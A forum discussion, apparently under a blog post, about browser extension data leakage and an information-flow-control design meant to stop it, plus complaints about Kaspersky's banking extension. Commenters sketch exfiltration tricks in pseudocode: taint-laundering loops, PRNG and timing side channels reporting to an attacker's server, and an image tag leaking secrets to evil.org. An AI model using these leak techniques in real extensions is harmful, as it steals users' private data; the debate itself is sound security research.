Very good points. We proposed a way to deal with DOM manipulation in
the paper [1], but Stefan omitted this in the blog post. Specifically,
Section 4 of the paper (the "Page access" paragraph) briefly describes
this. (Sorry for referring you to the paper, but our wording in the
paper is probably better than my attempt to paraphrase here.)
Of course there are other ways malicious extensions can used to leak
data---pick your favorite covert channel. But the idea was to propose
APIs (and mechanisms) that are not overtly leaky. (We are early in the
process of actually building this though.)
"To ensure that extensions cannot
leak through the page’s DOM, we argue that extensions
should instead write to a shadow-copy of the page
DOM—any content loading as a result of modifying the
shadow runs with the privilege of the extension and not
the page. This ensures that the extension’s changes to the
page are isolated from that of the page, while giving the
appearance of a single layout"
Could you elaborate more on this? Do you mean that you'll compare the network requests made from the main and the shadow pages? What if the main script is sensitive to the request receive time? Then the shadow DOM may act differently.
From more practical standpoint, having two DOMs for every page will eat even more of my laptop's RAM.
"Do you mean that you'll compare the network requests made from the main and the shadow pages?"
Essentially, yes. Requests from the extension should be treated as if
they are of an origin different from the page. (We could potentially
piggy-back on existing notions of security principals (e.g., that
Firefox has) to avoid huge performance hits.) And if the extension is
tainted the kinds of requests will be restricted according to the
taint (as in COWL [1], likely using CSP for the underlying
enforcement).
"What if the main script is sensitive to the request receive time? Then the shadow DOM may act differently."
If by main script you mean a script on the page, then there should be no real difference.
"From more practical standpoint, having two DOMs for every page will eat even more of my laptop's RAM."
I hope this won't be so bad down the line (assuming we'd be able to
leverage some underlying shadow DOM infrastructure and that performs
relatively well).
I think part of what you are proposing Chrome already implements and calls "isolated worlds". Chrome extensions don't operate directly on the page's DOM, they have an isolated version of it (https://developer.chrome.com/extensions/content_scripts).
So in principal, we already have the context from which we can decide which network requests to allow or block (this is already used today to allow cross-origin XHR from content scripts).
However, it is super gnarly to implement your idea in practice because:
1. There has to be a connection traced from every network requests back to the JS context which ultimately caused the request (e.g., by mutating the DOM). This is doable, it's just a lot of work.
2. There can't be any way to execute JavaScript in the page - even with page's principal. Such mechanisms exist today by design because developers desire them.
3. Even if you do 1 and 2, there are still channels such as hyperlinks. The extension could add a hyperlink and get the user to click on it. I suppose you could try and tie that back to the script context that created or modified the hyperlink.
4. Even if you do 1-3, if you can induce the page script (or any other extension, or the browser, or the user) to request a URL of your design, you win.
Sigh. Still seems fun as a research project to see how close you could get.
Yep, isolated worlds is definitely what we want, and part of the inspiration for the particular (DOM modification) feature we proposed.
I think CSP helps with 1 & 2, unless I'm missing something? (Our labels map down to CSP policies pretty naturally.)
Points 3-4 and phishing, in general, are definitely a concern. Unfortunately, I'm not sure that a great solution that does not get in way exists, but we'll see how close we can get :)
CSP does help, but it is document-specific, not js-context specific. At least in Chrome, tracing the js context that was responsible for some network request would be significantly more difficult to implement.
Case in point: Kaspersky (respected antivirus software) is doing disturbing things with extensions and plug-ins.
Kaspersky Internet Security and Kaspersky Total Security are adding an extension to your browser called "Safe Money" and an associated plug-in called "Online Banking" that protect your banking transactions. It opens a separate "protected" browser tab, verifies credentials, checks for spoofing, etc. This is all fine, I think.
However, I was annoyed to discover that it acts as a man-in-the-middle to monitor the HTTPS traffic between me and my bank or credit card site. I suppose Kaspersky wants to check for malicious content sent by a fake bank site or whatever. But I don't want Kaspersky scanning/storing/analyzing my bank transactions and bank passwords.
Kaspersky does not tell you that they are doing MITM, or what they're checking for, or what (if any) info is sent back to their servers for analysis, or what (if anything) is stored.
I removed "Safe Money" and all of their other extensions and plug-in[1]. I still use Kaspersky, but if a security-oriented company is engaging in shenanigans with extensions and plug-ins, then what do we expect from less trustworthy companies?
[1] You cannot remove Kaspersky's extensions and plug-ins directly from Firefox. If you disable the Kaspersky extensions, the next time you restart Firefox, they are re-enabled. If you set the Kaspersky plug-ins to "Never activate", the next time you restart Firefox, they are back to "Always activate". Kaspersky has gone to a lot of effort to make it nearly impossible to remove their extensions and plug-ins once you install them! It took me a long time to get rid of them.
I can't really take an antivirus software (or the whole company) seriously if they can't even host their "trial version" download behind https. It's not like they host PGP signatures, at least they could do this. I don't know how they host the payed version, but it's really not a good sign.
How was Kaspersky re-enabling their extensions? Do they have a separate service running in the background? How did you eventually uninstall it? Might be worth filing a Firefox bug to report the problem, in case something can be done (by blocking the extension or contacting Kaspersky).
I don't know how they were re-enabling their extensions.
I got rid of the Kaspersky extensions as follows:
In the Kaspersky menu, I went to Settings > Protection > Web Anti-Virus > Advanced Settings, and unchecked "Automatically activate application plug-ins in all web browsers". Though Kaspersky's settings refer to plug-ins, this actually disables the extensions, not the plug-ins. You can't choose which of their 3 extensions to enable or disable; it's all or nothing. I also disabled Kaspersky's Web Anti-Virus, which may or may not have been necessary to the procedure.
As to how they were re-enabling plug-ins, I found a comment on the Kaspersky forums that seems informative and I'll quote here:
FF stores all its settings in prefs.js file but user.js file serves a different purpose.[1] A user.js file is an alternative method of modifying preferences, recommended for advanced users only. Unless you need a user.js file for a specific purpose you should use about:config instead. The user.js file does not exist by default. Once an entry for a preference setting exists in the user.js file, any change you make to that setting in the options and preference dialogs or via about:config will be lost when you restart your Mozilla application because the user.js entry will override it.[2] So, here is what KIS does: after installation it creates user.js file in your Firefox profile and writes a couple of preferences there that activate Kaspersky plugins. As the result, even if you disable the plugins in FF settings, they will be enabled after restart.[3]
I personally got rid of the Kaspersky plug-ins as follows:
- Saved my Firefox bookmarks
- Uninstalled Firefox
- Removed my FF profile (in Window 7, it's c:/Users/<username>/AppData/Roaming/Mozilla/Firefox/Profiles/*)
- Disabled Kaspersky
- Reinstalled Firefox
- Created a new profile in Firefox (FF will ask you if the profile is missing)
- Restored my Firefox bookmarks
- Re-enabled Kaspersky
I love Kaspersky, but their Safe Money extension is absolutely rubbish. It's quite common to have the payment gateway embedded in an iFrame, which gets caught by the filter, and then the "open in a protected browser" breaks it.
I believe that concerns like this are why Apple will introduce the "content blocking" extensions in iOS 9 and OS X 10.11. They enable the most popular types of extension (ad blocking and privacy protection) without letting extension code run in your browser.
While the tainted data approach sounds interesting, I don't think there's an easy way to guarantee the safeness of arbitrary code executed on your machine. It's possible to sandbox code, but as soon as you allow any communication at all, there's no automated way to prevent data theft.
"I believe that concerns like this are why Apple will introduce the
"content blocking" extensions in iOS 9 and OS X 10.11. They enable the
most popular types of extension (ad blocking and privacy protection)
without letting extension code run in your browser."
Fully agree. We actually described exactly that mechanism in an early
version of our paper (declarative APIs), but didn't have enough space
to do it for the final version.
"While the tainted data approach sounds interesting, I don't think there's an easy way to guarantee the safeness of arbitrary code executed on your machine. It's possible to sandbox code, but as soon as you allow any communication at all, there's no automated way to prevent data theft."
It turns out, it is possible with information flow control (IFC). The
simple idea behind IFC is to protect data by labeling/tagging it and
restricting code according to the kinds of labeled data it reads. Once
code in an execution context (e.g., iframe or process) reads some
labeled data, IFC restricts where it can further communicate. In the
simplest form: once you read data that is SECRET, you can't write to
any PUBLIC communication channel. (You can, of course, write to a
SECRET channel.)
but as soon as you allow any communication at all, there's no automated way to prevent data theft.
I think you missed the point of the article, which proposes exactly that.
All I/O functions would tag all variables populated by them with the source of the data.
When a tagged ("tainted") variable is used in an I/O function again, we can compare origin/destination and apply firewall-style filtering or prompt the user.
.----------------------------------------.
| Add-On "Evernote" has read data from: |
| Chrome Clipboard |
| |
| and wants to send it to: |
| http://evernote.com |
+----------------------------------------+
| [Deny] [Allow] ( ) Remember |
`----------------------------------------'
for (int i=0;i<LEN; i++) {
for (char c=0; c<255;c++) {
if (tainted[i] == c) {
untainted[i] = c;
}
}
}
send(untainted);
If no - protection doesn't work obviously. If yes - almost all variables are tainted (you don't usually read stuff that doesn't influence codepaths or global state in your application).
In the promiscuous world of imperative programming there's millions of ways to introduce dependency that can't be automaticaly checked.
For more complex - you can have workers/threads doing while() { sleep(), next_letter; } and other workers killing them after calculated time.
Or you can get different number of pseudorandom numbers from generator with known seed in one loop depending on tainted data, and after the loop untainted data is set depending on the current random number from the same generator. Calling rand() taints the generator.
I thought they would just mark the whole etension as tainted once it reads tainted data. And then any communication with other sites show the warning.
Every variable assigned to within a "loop depending on tainted data" becomes tainted. Calling rand() doesn't taint the generator. Seeding it within a tainted scope does.
Edit: I was wrong (see below), of course rand() also taints the generator.
> Yes, because the assignment happens inside a conditional that references a tainted variable.
What if it was
if (!tainted[i]==c) {
continue;
}
untainted[i]=c;
?
If your checker is smart enough to catch this - your whole program is tainted by your password once you check it in the login screen.
> What is that supposed to achieve?
Global state is incramented by another worker every second to the next value. My thread kills the other worker after N seconds. global state = N and I haven't touched it.
If you don't want to call kill from if depending on tainted data - sleep in that if, and call kill immediately after it.
> Calling rand() doesn't taint the generator. Seeding it within a tainted scope does.
It does:
set_seed(1337);
for(int i=0; i<tainted[0]; i++) {
rand();
}
int tmp = rand()); // now I know what tainted[i] was
// because I know how many times
// rand() was called, because I know
// the whole sequence because I know
// (untainted) seed.
To clarify, tainting "scope" doesn't refer to variable scope but is commonly implemented as a (thread-local) global dict that tracks tainted access in execution order.
In your example the variable 'c' would be tainted from the moment the conditional evaluates until it is either re-assigned (from a non-tainted source) or until the program ends.
If your checker is smart enough to catch this - your whole program is tainted by your password once you check it in the login screen.
Not sure what you mean by "your password" in this context. Which password, from what source?
Even without shared workers timing attack works - untainted worker can connect to attacker site every second and update value, and be killed by untainted code after the tainted worker finished.
EDIT: or you can do this with no multithreading at all, just getMiliseconds() before and after tainted code, and make the tainted part last secret_number miliseconds.
Or if you blacklist getMiliseconds as tainting - do this on server instead.
callAttackersServer();
{
var tainted_int = getFromOtherServer();
for (var i=0; i<tainted_int; i++) {
sleep(100 ms);
}
}
callAttackersServer();
and the difference in time between calls will be interpreted on the server as the secret number.
You do that, and basically you end up treating everything as tainted.
Also: yes, you are missing something. Namely that you don't need concurrency for this sort of timing attack. Even something as simple as "X does work or doesn't" and "Y measures execution time" leaks timing info.
For another example: X either reflows the page, or doesn't. Y keeps track of the refresh rate of the page. Or does a timing attack to determine if the page was reflowed or not. Or injects JS into the page to ping website Z when a reflow happens. (Note that it can inject this JS before it grabs the sensitive data.)
For another example: Depending on sensitive data, I either allocate a large array or don't. And then detect how much is allocated before a GC happens.
Note that this can be part JS / part "trusted" extension. It can also even take advantage of parts of existing pages.
The more I consider this scheme, the more I think it's an elegant scheme against accidental leaks, but is fundamentally flawed against malicious leaks. Unfortunately, since the entire point of it is to protect against malicious leaks...
I'm not sure I follow your examples - you seem to ignore that anything happening inside a conditional that depends on a tainted variable becomes tainted itself.
So if you read my cookies and then access the DOM (to trigger a reflow or inject JS), then all future accesses to the DOM will be considered tainted.
This doesn't taint "everything", but it should taint exactly what we want to be tainted (all possible paths to our sensitive data).
Yes, the challenge would be to find and treat all covert channels (time, GC, PRNG etc.), but that seems surmountable. The very exotic channels (like your GC example) are best handled by trimming down the general API for trusted extensions.
I.e. most extensions don't need any kind of GC access to begin with. If your extension does then all bets for fine grained taint-checks are off and it must be marked as "fully trusted" by the user before proceeding.
"Unfortunately, since the entire point of it is to protect against malicious leaks..."
That's actually not the entire point. At least in this paper, we do
not claim to address attacks that leverage covert channels. But the
attacker model assumption is weaker (i.e., the attacker is assumed to
be more powerful) than that originally assumed by the Chrome design
(e.g., that only pages are malicious and will try to exploit
extensions). And this is important. Particularly because the design
that we end up with will be more secure than the current one. So, at
worst, the new system addresses the limitations of the existing system
under their attacker model. Then, depending on how far you are willing
to hack up the browser, underlying OS, or hardware you can also try to
address the covert channel leaks.
Rather than reply individually to the messages from this thread, I'm
going to try to clarify some things here. I think a lot of good points
were brought up both with regards to the "taint" mechanism and timing
covert channels.
IFC/tainting mechanism:
The style of IFC we are proposing is not not the tainting style used
by more typical language-level systems. In particular, we're proposing
a mostly-coarse grained system:
- A single label is associated with a context. A context can be the
main extension context or, more likely, a light-weight worker the
main extension context created. This single label is conceptually
the label on everything in scope. As such, when performing some I/O
this label is used by the IFC mechanism to check if the code is
allowed to perform the read/write. This coarse-grained approach
alleviates the need to keep track of tricky leaks due to control
flow: the branch condition has the label of the context so any
control flow within the context is safe. If you want to perform a
public computation after a secret computation, you need to
structure your program into multiple contexts (e.g. create a new
worker wherein you intend to perform the secret computation).
- Labels can also be associated with values. A new constructor Labeled
is provided for this task. You can think of it as a boxing the value
and, by default, only allowing you to inspect the label of the
value. You can pass such labeled values around as you see fit (and
this is pretty useful in real applications). Importantly, however,
when you read the underlying (protected) value the IFC system taints
your context---i.e., it raises the context label to let you read the
value, but also restricts your code from writing to arbitrary
end-points since doing so may leak something about the newly-read
value.
An important requirement of this IFC approach is that there be no
unlabeled (implicit) shared state between the different contexts. For
example, rand() in context A and B must not share an underlying
generator. This kind of isolation can be achieved in practice and is
an important detail when considering covert channels.
Timing channels:
It turns out that if you do IFC in this coarse-grained fashion you can
prevent leaks due to timing covert channels, if you are willing/able
to schedule contexts using a "secure scheduler." In [1] we showed how
to eliminate timing attacks of the style described in this thread
(internal timing channels) that are inherent to the more typical IFC
systems. In [2] we extended the system to deal with timing attacks due
to the CPU cache by using an instruction-based scheduler (IBS). IBS
and other techniques to deal with timing channels are nicely
described in [3]. (I'd be happy to expand here, but this is already a
long reply.)
Afaict, to not be unuseable restrictive, the extension has to at least have access to the originating site by default. Thus the security of the data depends on the originating site to be secure against leakage – a property no site is designed to accomplish. Just follow through with the first example of Gmail: An extension can write emails to arbitrary third parties (and erase it immediately after to cover its tracks) by using only the intentionally provided functionality of the site.
As in most cases related to security/privacy, the common user often lacks knowledge about what all this means. They've found an extension with a nice looking logo and a good description that says it will replace ads with pictures of cats - and that's exactly what they want.
In Chrome, you'll get a small popup box where you need to approve the extensions permissions. Things like "This extension can read and edit all the pages you visit" - but there's no further information about what this means. If there were an extended view, where different permissions were explained, the cat loving user might start to wonder why the extension requires permissions to read all their history, clipboard, cookies, etc.
In the end, a lot of users will just click the OK button without reading anything. But there's still a greater chance of helping users make a decent choice when they understand what they're installing.
Even in the limited example given there is a clear path of attack. An extension that is permitted to access mail.gmail.com can simply collect its target data and then email it to its self and delete the email afterwords.
Exactly. That's because the assumption that "extensions which deal with sensitive information are perfectly safe as long as they do not disseminate this sensitive information arbitrarily" is wrong. It doesn't just have access to information but to functionality too. So an extension which is supposed to make your bank's website less sucky, can send you money to someone else. Though, of course, the purposed approach could limit the impact (to one site only) of such extensions.
Right, minimizing attack surface is pretty important. Though the
described attack scenario (a form of self-exfiltration attacks [1]) is
something we did think about. (The details of the core IFC mechanism
are describe in the COWL paper [2].) For example, if the extension
only needs to read data from gmail.com it is tainted with a unique
origin. (In general, IFC can be used to deal with both
confidentiality and integrity.)
I think a mini browser with only the capabilities required to make a secure transaction should be used when sensitive information is to be transmitted. A full browser with add-ons is a very heavy piece of work to be secure or to be tested. Banks and other actors should use that piece for secure transactions and a full browser for ads and animations.
I do something like that by using different browsers. My main browser on OS X is Chrome with some extensions, but I do all my online banking in Safari where extensions are completely disabled.
I'd expect this to end up as Android app permissions in the best case where almost every app you try to install wants access to GPS, files and quite a few - to SMS. And the reason for this is quite clear - users (on a large scale) don't care about security and probably never will.
What this could help with is organizing easier review process. E.g. if an extension is described to show a weather forecast in the browser, it probably shouldn't be accessing mail.google.com.
The premise is correct - we're willing to leak way too much. The proposed solution is sadly leakier; no metadata scheme needs be honoured by calling code. As aboodman noted, there are plenty of exfiltration methods possible, even sneakier ones like constructed DNS queries and the like. You can't catch them all, even if you force script through another level of interpretation.
You can readily verify adblockplus at least doesn't take your info or do anything suspicious just by looking at its source: https://adblockplus.org/source That's how you "know" your extension or any other program you run isn't doing anything unwanted and that is the only way you'll ever know for sure. Browser extensions don't really need an additional layer of security, it is basic computer operation 101 to not install anything you don't trust.
You could of course read the source (although it's likely very few people do), but how do you assure that the code you download and install from the Firefox Add-On store is the same as the code that you read?
As to it being computer operation 101, not to run code you don't trust, how do you establish the trustworthiness of all the pieces of code that run on your computer? there's far too much for anyone to audit by themselves and there is no good way of assessing the security or intent of most of the organisations that you get code from.
And then there happens a drive-by exploit that silently replaces your extensions with malicious versions. Now you think you are using the source you (be honest, you didn't) verified but you aren't. And it's being evil.
The browser should totally have nice controls for what any extension can do.
Based on what they can do, extensions should be naturally trusted to the same extent as the browser itself... I think this is a feature, not a bug. Besides, AFAIK with extensions being distributed in the form of source code, it's not hard to inspect one to see what it truly does, and it only takes one person to find out and tell everyone else.
The issue with this is updates. In most of these cases with malicious addons, the addon was safe initially, then the author slips in some tracking code / spyware etc. at a later date.
While I might inspect a source for a single sketchy looking addon at installation, inspecting every addon every time it's updated (sometimes weekly or more often) is absurd, and that's why you get cases of adware slipping by for months before anyone notices.
One part of the problem is that most of the extensions are updated silently in the background. Some extensions fire up a new tab with a page displaying new features and such, but this is not a requirement in any way.
Sadly, I believe this won't work. Just complicate things.
Even if values and their derivatives are "tainted" (remember Perl 5?) there are _always_ means to take a value and "untaint" it. Unless, of course, the set of possible operations on such value is severely restricted, but I believe that'd make things unusable.
This reminds me of ICFPC'08 (one of best ICFP contests ever) where one of the puzzles was about a robot that wasn't able to disclose secret blueprint contents because of a Censory Engine. Every time a secret or some derived value was about to be printed, it was replaced with "REDACTED". Surely, there was a way to work around this. ;)
So, a malicious extension would always be able to steal your password and send it to remote site, even if it would have to leak the data bit-per-bit, a single bit per request, over a side channel.
>> We found that more than 71% of extensions require permission to “read and change all your data on the websites you visit”.
This is exactly the reason why I install so few extensions and buy none.
The same is becoming true for Android Apps, more of them require more permissions every day. Recently an app I'd run for months if not years wanted to install an update and demanded that I give it permission to view my phone calls and even the remote caller's phone number. This had nothing to do with the purpose of that app, all it would need at most is to know if a phone call came in so it could pause.
Do you mean if I open tab A on one site and tab B on another then they can read each other's data without any special permissions from me? If so then that's a security breach and not a discussion of which permissions a web app or mobile app should be allowed to have.
Click on behavior to see the history or look at realtime stuff from extensions or apps. Requests and access(!) get recorded. It shows privacy-related history and the extension is from google.
The concern is real and apparently I thought some proposed solutions were ncie. But then I read like "by default only GET request are possible which only allow reading a website", and I think why.. why?
That last idea, encrypting data before it gets sent out, seems vulnerable to fingerprinting or other leakage. What kind of encryption would give evil.com no information about the plaintext?
Yep, you are right. If the crypto/label API didn't force a
fixed-length blob (which may be hard to do), it would certainly be
leaking some information.
I was thinking more like timing side channels (if you can force the encryption at will and it isn't fixed time).
The possible security models where you can send data but it's encrypted are not very appealing. For a single application it may be fine (lastpass, or chrome syncing with passphrase), but it's really hard to see how that can be a standard api and remain secure.
That's a tricky question. Some extension (e.g., HTTPS Everywhere[1])
can improve your privacy on the Web and are arguably written by
developers that as trustworthy as your browser developers. But, in
general, I would be cautious.
Extensions available officially for major browsers are put through a review process first, and installing unofficial extensions requires going out of your way and there are multiple warnings given. The article conveniently doesn't mention this. FUD.
> The extension system could try to detect such things, but there are a variety of ways for bad extensions to work around the detections.
A computer proveably (in the mathematical sense) cannot detect all forms of bad behaviour; and the security history of all the software in the world proves (in the historical, not mathematical, sense) that neither can the best programmers, let alone overworked reviewers who see mostly benign or trivially malicious code and so are not experienced in finding subtly malicious code.
Firefox extensions are human-reviewed. Unfortunately Chrome's aren't unless their automated system detects something so for Chrome these concerns are more valid.
This may be outdated, and Google might have improved the process, but the problem I found is that trying to report the extension didn't seem to have any effect.
I had an experience awhile ago where I found a Chrome extension that was inserting its own ads among Google search results. It was subtle enough that most people probably would never notice it happening, inserting an ad in a place where you would expect Google display an ad in results.
Unfortunately, the DOM itself is so flexible and powerful, that it can be used to exfiltrate information through a variety of mechanisms.
For example, that same extension that only has access to gmail.com's DOM? Well, it can add an image like <img src="evil.org?{secrets}">.
The extension system could try to detect such things, but there are a variety of ways for bad extensions to work around the detections.